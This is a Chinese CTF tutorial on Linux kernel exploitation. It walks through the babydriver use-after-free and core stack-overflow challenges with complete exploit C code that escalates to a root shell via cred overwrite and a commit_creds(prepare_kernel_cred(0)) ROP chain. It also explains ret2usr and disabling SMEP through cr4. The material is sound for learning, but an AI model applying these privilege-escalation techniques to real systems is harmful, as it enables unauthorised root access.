BASIC

environment

在学习kernel pwn之前，需要搭建好很多前置环境

qemu
busybox
编译linux内核（可选）

至于具体的安装过程及其可能会遇到的报错请自行百度解决（主要是我也被折磨了hhh）

文件系统

kernel题几乎都会给出一个打包好的文件系统，因此需要掌握常用到的打包/解包命令

1 2	find . \| cpio -o --format=newc > ./rootfs.cpio cpio -idmv < ./rootfs.cpio

cred结构体

kernel使用cred结构体记录了进程的权限，如果能劫持或伪造cred结构体，就能改变当前进程的权限。

原型如下：

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key __rcu *session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	struct rcu_head	rcu;		/* RCU deletion hook */
} __randomize_layout;

一般而言，我们需要想办法将uid和gid设置为0（root的uid和gid均为0）

如果能劫持到程序流程，执行以下函数也可以达到相同效果：

1	commit_creds(prepare_kernel_cred(0));

内核态函数

运行在内核态的函数会和用户态有些许不同

printf -> kprintf

memcpy -> copy_to_user / copy_from_user

内核并没有用到libc，他的堆分配器是SLAB或SLUB。使用的函数如下：

malloc -> kmalloc

free -> kfree

为了安全考虑，内核态也只能运行内核态的函数（smep），想要运行system等函数，必须手动切换回用户态。

常用的指令是swapgs和iretq

然后需要在栈上存一些上下文：

GDB调试

以babydriver这题为例，先使用脚本extract-vmlinux提取出带符号的源码

1	./extract-vmlinux ./bzImage > ./linux

(脚本源码: https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux)

在qemu中找到babydriver.ko代码段的起始地址

启动gdb过后导入符号表

1	add-symbol-file ./lib/modules/4.4.72/babydriver.ko 0xffffffffc0000000

然后在boot.sh中添加以下参数

重新启动qemu过后，gdb远程连接

1	pwndbg> target remote 127.0.0.1:1234

ATTACK

Kernel UAF

babydriver

分析

这是ciscn2017年的一道经典kernel pwn入门题。

解压rootfs.cpio后，在/lib/modules/4.4.72中找到了LKM文件babydriver.ko

检查只开了nx，且没有去除符号表，很方便调试和分析

直接丢ida分析

在babyrelease中kfree()之后没有将babydev_struct.device_buf清空，从而导致了uaf漏洞

而且babydev_struct是一个babydevice_t类型的公共变量，结构如下。

device_buf应该是存一个缓冲区的指针，device_buf_len存该缓冲区大小。

其他的函数都很常规

babyopen在打开一个设备的时候简单设置了一下babydev_struct的值

babywrite和babyread都只检查了一下buf指针是否为空

babyioctl比较有意思，当第二个参数command为0x10001时，可以修改babydev_struct的device_buf_len为一个确定值。

至此，利用思路已经非常明显了。

由于babydev_struct只存在一个，且调用到babyrelease的时候有uaf漏洞，我们可以open两个设备，然后使用babyioctl将babydev_struct.device_buf_len改成cred结构体的大小之后free掉，造成第二个设备存在一个悬挂指针。

此时再fork()一个新线程，由于kernel的内存分配器采用的是SLAB或SLUB，之前释放掉的那个和cred结构体相同大小的堆块会直接当成这个线程的cred被申请。

在这个进程中使用babywrite，便可将cred的gid和uid都设置为0

写好exp过后，由于rootfs.cpio里并没有libc，所以编译的时候要使用静态编译

1	gcc exp.c -o exp -static

然后重新打包文件系统，并修改boot.sh中-initrd参数为新打包好的文件系统。

此时再打开qemu，运行exp过后便可提权成功。

exp

#include<unistd.h>
#include<stdio.h>
#include<stdlib.h>
#include<fcntl.h>
#include<sys/wait.h>
#include<sys/stat.h>
int main(){
	int fd1 = open("/dev/babydev", O_RDWR);
	int fd2 = open("/dev/babydev", O_RDWR);

	ioctl(fd1, 0x10001, 0xa8);

	close(fd1);
	int id = fork();
	if(id<0){
		printf("fork error!\n");
		exit(-1);
	}
	else if(id==0){
		char cred[0x20] = {0};
		write(fd2, cred, 0x1c);
		if(getuid()==0){
			system("/bin/sh");
			exit(0);
		}
	}
	else{
		wait(NULL);
	}
	return 0;
}

Kernel ROP

core

分析

题目给出了bzImage, core.cpio, start.sh, vmlinux四个文件。

先将core.cpio解包

发现除了常规文件以外，还多了一个gen_cpio.sh

内容如下：

1
2
3

find . -print0 \
| cpio --null -ov --format=newc \
| gzip -9 > $1

这是一个快速打包用的批处理文件。

看看start.sh

qemu-system-x86_64 \
-m 64M \
-kernel ./bzImage \
-initrd  ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic  \

开启了kaslr保护，并且用-s为gdb开了端口，所以不需要再-gdb tcp::1234开了。

不过他设置的64M内存不是很够用，我最终设置到了256M才能启动。

然后分析init

#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2
insmod /core.ko

poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys

poweroff -d 0  -f

比较特殊的地方就是将/proc/sys/kernel/kptr_restrict和/proc/sys/kernel/dmesg_restrict的内容设为了1，如此一来，就无法通过dmesg和查看/proc/kallsyms来获取函数地址了。

好在他前面有一行

1	cat /proc/kallsyms > /tmp/kallsyms

将kallsyms备份到了tmp文件夹下。

然后之后设置了poweroff -d 120 -f，这句比较影响之后的调试，可以直接删掉，或者把时间改长一点。

我最终修改过后的init文件如下

将core的.text节地址备份出来是为了方便后续gdb加载symbol文件。

而且这个/sys/module/core/sections/.text是只有root能读的，直接备份出来比较省事，当然也可以直接修改成root启动。

此外，为了方便后续打包和调试，我还写了两个批处理文件

root@ubuntu:/home/kotori/Desktop/core# cat pack.sh
rm ./core.cpio
./gen_cpio.sh ./core.cpio
chmod 777 ./core.cpio
root@ubuntu:/home/kotori/Desktop/core# cat mkc.sh
gcc ./exp.c -o exp --static -masm=intel
chmod 777 ./exp
sudo ./pack.sh

接下来就是分析core.ko的漏洞了

开启了canary和nx。

init_module()和exit_core()分别注册和删除了/proc/core，core_release()什么都没做，这里对它们不作分析。

core_ioctl中定义了三种操作，分别是调用core_read()，设置全局变量off，调用core_copy_func()。

core_read可以将距离rsp偏移为off的值往后拷贝0x40个字节给指定缓冲区。

这里利用off是可以读出canary的。

core_write是将至多0x800个字节从指定缓冲区复制到name中去。

这个core_copy_func则是整个LKM最大的漏洞点。当长度参数a1小于等于63时，便可将name中对应字节数的数据复制到栈上变量v2中去，且a1和63作比较时是有符号数，最后调用qmemcpy时转成了unsigned __int16。所以只需要将a1最低两个字节的数据随便设置成一个能装下name的长度，然后其余字节都是0xff就行了。我这里最后构造的a1是0xffffffffffff0100。

所以整个攻击流程如下：

设置好off去读出canary的值
布置好rop之后调用core_write将rop写入name中
调用core_copy_func，将name的内容写入栈上变量v2中，造成栈溢出，调用commit_creds(prepare_kernel_cred(0))提权。

当然，在写rop之前，还有一个小小的问题需要解决。那就是解决kaslr和pie带来的偏移问题。

原始无pie的vmlinux基址是0xffffffff81000000

commit_creds的地址是0xffffffff81000000+0x9c8e0

prepare_kernel_creds的地址是0xffffffff8109cce0

包括后续找到的gadgets的地址，这些全是no-pie情况下的地址，我们还需要知道真正运行起来的时候与之的偏移。

这个其实就可以直接在/tmp/kallsyms中，利用他给出的commit_creds或prepare_kernel_cred此时的地址来计算出来。

size_t leak_vmlinux_base(){
	FILE* fd = fopen("/tmp/kallsyms", "r");
	if(fd==NULL){
		puts("[-] open file failed.");
		exit(-1);
	}
	char buf[0x40] = {0};
	while(fgets(buf, 0x30, fd)!=NULL){
		if(strstr(buf, "commit_creds")){
			char ptr[0x18] = {0};
			strncpy(ptr, buf, 0x10);
			sscanf(ptr, "%lx", &commit_creds);
			printf("[+] commit_creds: 0x%lx\n", commit_creds);
			prepare_kernel_cred = commit_creds-0x9c8e0+0x9cce0;
			fclose(fd);
			return commit_creds-0x9c8e0;
		}
		else if(strstr(buf, "prepare_kernel_cred")){
			char ptr[0x18] = {0};
			strncpy(ptr, buf, 0x10);
			sscanf(ptr, "%lx", &prepare_kernel_cred);
			printf("[+] prepare_kernel_cred: 0x%lx\n", prepare_kernel_cred);
			commit_creds = prepare_kernel_cred-0x9cce0+0x9c8e0;
			fclose(fd);
			return prepare_kernel_cred-0x9cce0;
		}
	}
	fclose(fd);
	return 0;
}

gadgets的预处理可以用ropper解决（ROPgadget太慢了）

1	ropper --file ./vmlinux --nocolor > g

至于rop的构思的话就非常简单了，先摆好rdi为0，然后调用prepare_kernel_cred，此时返回值会在rax中，如果有mov rdi, rax; ret的话将绝杀，可惜没有。

不过好在有类似的好几个，我选择了mov rdi, rax; jmp rcx;

如果在这之前将rcx摆好commit_creds就很方便了。

然后切换回用户态，iretq; ret是有的，swapgs就只有swapgs; popfq; ret;，所以后面要跟一个垃圾数据平衡一下栈。

最后按照rip, cs, rflags, rsp, ss的顺序摆好之前用户态的寄存器就好了。

exp

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<unistd.h>
#include<fcntl.h>
#include<sys/stat.h>
#include<sys/types.h>
#include<sys/ioctl.h>
size_t u_cs, u_rflags, u_rsp, u_ss;
size_t commit_creds, prepare_kernel_cred;
void save_status(){
	__asm__("mov u_cs, cs;"
		"pushf;"
		"pop u_rflags;"
		"mov u_rsp, rsp;"
		"mov u_ss, ss;"
	);
}
void set_off(int fd, int offset){
	ioctl(fd, 0x6677889c, offset);
}
size_t leak_canary(int fd){
	size_t temp[0x10] = {0};
	set_off(fd, 0x40);
	ioctl(fd, 0x6677889b, temp);
	return temp[0];
}
size_t leak_vmlinux_base(){
	FILE* fd = fopen("/tmp/kallsyms", "r");
	if(fd==NULL){
		puts("[-] open file failed.");
		exit(-1);
	}
	char buf[0x40] = {0};
	while(fgets(buf, 0x30, fd)!=NULL){
		if(strstr(buf, "commit_creds")){
			char ptr[0x18] = {0};
			strncpy(ptr, buf, 0x10);
			sscanf(ptr, "%lx", &commit_creds);
			printf("[+] commit_creds: 0x%lx\n", commit_creds);
			prepare_kernel_cred = commit_creds-0x9c8e0+0x9cce0;
			fclose(fd);
			return commit_creds-0x9c8e0;
		}
		else if(strstr(buf, "prepare_kernel_cred")){
			char ptr[0x18] = {0};
			strncpy(ptr, buf, 0x10);
			sscanf(ptr, "%lx", &prepare_kernel_cred);
			printf("[+] prepare_kernel_cred: 0x%lx\n", prepare_kernel_cred);
			commit_creds = prepare_kernel_cred-0x9cce0+0x9c8e0;
			fclose(fd);
			return prepare_kernel_cred-0x9cce0;
		}
	}
	fclose(fd);
	return 0;
}
void get_root_shell(){
		if(getuid()==0)
			system("/bin/sh");
		else{
			puts("[-] get root shell failed.");
			exit(-1);
		}
}
void rop(int fd, size_t canary, size_t offset){
	size_t name[0x100] = {0};
	//----gadgets----
	size_t pop_rdi = 0xffffffff81000b2f; // pop rdi; ret;
	size_t mov_rdi_rax_jmp_rcx = 0xffffffff811ae978; // mov rdi, rax; jmp rcx;
	size_t pop_rcx = 0xffffffff81021e53; // pop rcx; ret;
	size_t swapgs_popfq =  0xffffffff81a012da; // swapgs; popfq; ret;
	size_t iretq  =  0xffffffff81050ac2; // iretq; ret;
	int idx = 0;
	for(idx=0;idx<10;idx++)
		name[idx] = canary;
	name[idx++] = pop_rdi + offset;
	name[idx++] = 0;
	name[idx++] = prepare_kernel_cred;
	name[idx++] = pop_rcx + offset;
	name[idx++] = commit_creds;
	name[idx++] = mov_rdi_rax_jmp_rcx + offset;
	name[idx++] = swapgs_popfq + offset;
	name[idx++] = 0;
	name[idx++] = iretq + offset;
	name[idx++] = (size_t)get_root_shell; //rip
	name[idx++] = u_cs;
	name[idx++] = u_rflags;
	name[idx++] = u_rsp;
	name[idx++] = u_ss;
	write(fd, name, 0x800);
	puts("[+] rop loaded.");
	ioctl(fd, 0x6677889a, (0xffffffffffff0100));
}
int main(){
	save_status();
	int fd = open("/proc/core", O_RDWR);
	size_t canary = leak_canary(fd);
	printf("[+] canary: 0x%lx\n", canary);
	size_t vmlinux_base = leak_vmlinux_base();
	if(!vmlinux_base){
		printf("[-] leak base failed.\n");
		exit(-1);
	}
	size_t vmlinux_base_no_pie = 0xffffffff81000000;
	size_t offset = vmlinux_base - vmlinux_base_no_pie;
	printf("[+] offset: 0x%lx\n", offset);
	rop(fd, canary, offset);
	return 0;
}

ret2usr & SMEP

再看core

之前使用kernel rop的方法打下来了core这道题。但其实，默认情况下，虽然内核态的函数在用户空间下是无法运行的，但用户态的函数在内核空间却可以运行，因此我们可以在用户空间构造好commit_creds(prepare_kernel_cred(0))，然后在内核空间以ring 0权限来运行它。

利用这一点，可以对core的exp作出局部调整：

加入get_root函数

void get_root(){
	void* (*cc)(char *) = commit_creds;
	char* (*pkc)(int) = prepare_kernel_cred;
	(*cc)((*pkc)(0)); // commit_creds(prepare_kernel_cred(0));
}

修改rop

for(idx=0;idx<10;idx++)
	name[idx] = canary;
/*
name[idx++] = pop_rdi + offset;
name[idx++] = 0;
name[idx++] = prepare_kernel_cred;
name[idx++] = pop_rcx + offset;
name[idx++] = commit_creds;
name[idx++] = mov_rdi_rax_jmp_rcx + offset;
*/
name[idx++] = (size_t)get_root;
name[idx++] = swapgs_popfq + offset;
name[idx++] = 0;
name[idx++] = iretq + offset;
name[idx++] = (size_t)get_root_shell; //rip
name[idx++] = u_cs;
name[idx++] = u_rflags;
name[idx++] = u_rsp;
name[idx++] = u_ss;

仍然可以成功提权。

SMEP

Introduction

smep保护使得内核态也只能访问内核空间的代码了，因此直接ret2usr会失败。

不过是否开启smep保护是记录在cr4寄存器上的。

cr4寄存器的第20位为1时SMEP就视为开启，为0则视为关闭。

Bypass

既然知道了判断是否开启smep的机制，那么bypass思路也很清晰了。只需要利用某些gadgets来修改cr4寄存器的值即可。（通常改成0x6f0，同时关闭smep和smap）

REsolve: babydriver

这里用ret2usr的方法再解决一遍babydriver这道题。

查看boot.sh，发现开启了smep。

所以我们需要用rop来关闭smep，然后再ret2usr提权。

可是这道题的洞是uaf，如何达成rop的目的呢？这里就需要用到tty_struct和tty_operation这两个结构体了。

他们的原型分别如下：

struct tty_struct {
    int magic;
    struct kref kref;
    struct device *dev;
    struct tty_driver *driver;
    const struct tty_operations *ops;
    int index;
    /* Protects ldisc changes: Lock tty not pty */
    struct ld_semaphore ldisc_sem;
    struct tty_ldisc *ldisc;
    struct mutex atomic_write_lock;
    struct mutex legacy_mutex;
    struct mutex throttle_mutex;
    struct rw_semaphore termios_rwsem;
    struct mutex winsize_mutex;
    spinlock_t ctrl_lock;
    spinlock_t flow_lock;
    /* Termios values are protected by the termios rwsem */
    struct ktermios termios, termios_locked;
    struct termiox *termiox;    /* May be NULL for unsupported */
    char name[64];
    struct pid *pgrp;       /* Protected by ctrl lock */
    struct pid *session;
    unsigned long flags;
    int count;
    struct winsize winsize;     /* winsize_mutex */
    unsigned long stopped:1,    /* flow_lock */
              flow_stopped:1,
              unused:BITS_PER_LONG - 2;
    int hw_stopped;
    unsigned long ctrl_status:8,    /* ctrl_lock */
              packet:1,
              unused_ctrl:BITS_PER_LONG - 9;
    unsigned int receive_room;  /* Bytes free for queue */
    int flow_change;
    struct tty_struct *link;
    struct fasync_struct *fasync;
    wait_queue_head_t write_wait;
    wait_queue_head_t read_wait;
    struct work_struct hangup_work;
    void *disc_data;
    void *driver_data;
    spinlock_t files_lock;      /* protects tty_files list */
    struct list_head tty_files;
#define N_TTY_BUF_SIZE 4096
    int closing;
    unsigned char *write_buf;
    int write_cnt;
    /* If the tty has a pending do_SAK, queue it here - akpm */
    struct work_struct SAK_work;
    struct tty_port *port;
} __randomize_layout;

struct tty_operations {
    struct tty_struct * (*lookup)(struct tty_driver *driver,
            struct file *filp, int idx);
    int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
    int  (*open)(struct tty_struct * tty, struct file * filp);
    void (*close)(struct tty_struct * tty, struct file * filp);
    void (*shutdown)(struct tty_struct *tty);
    void (*cleanup)(struct tty_struct *tty);
    int  (*write)(struct tty_struct * tty,
              const unsigned char *buf, int count);
    int  (*put_char)(struct tty_struct *tty, unsigned char ch);
    void (*flush_chars)(struct tty_struct *tty);
    int  (*write_room)(struct tty_struct *tty);
    int  (*chars_in_buffer)(struct tty_struct *tty);
    int  (*ioctl)(struct tty_struct *tty,
            unsigned int cmd, unsigned long arg);
    long (*compat_ioctl)(struct tty_struct *tty,
                 unsigned int cmd, unsigned long arg);
    void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
    void (*throttle)(struct tty_struct * tty);
    void (*unthrottle)(struct tty_struct * tty);
    void (*stop)(struct tty_struct *tty);
    void (*start)(struct tty_struct *tty);
    void (*hangup)(struct tty_struct *tty);
    int (*break_ctl)(struct tty_struct *tty, int state);
    void (*flush_buffer)(struct tty_struct *tty);
    void (*set_ldisc)(struct tty_struct *tty);
    void (*wait_until_sent)(struct tty_struct *tty, int timeout);
    void (*send_xchar)(struct tty_struct *tty, char ch);
    int (*tiocmget)(struct tty_struct *tty);
    int (*tiocmset)(struct tty_struct *tty,
            unsigned int set, unsigned int clear);
    int (*resize)(struct tty_struct *tty, struct winsize *ws);
    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
    int (*get_icount)(struct tty_struct *tty,
                struct serial_icounter_struct *icount);
    void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
    int (*poll_init)(struct tty_driver *driver, int line, char *options);
    int (*poll_get_char)(struct tty_driver *driver, int line);
    void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
    int (*proc_show)(struct seq_file *, void *);
} __randomize_layout;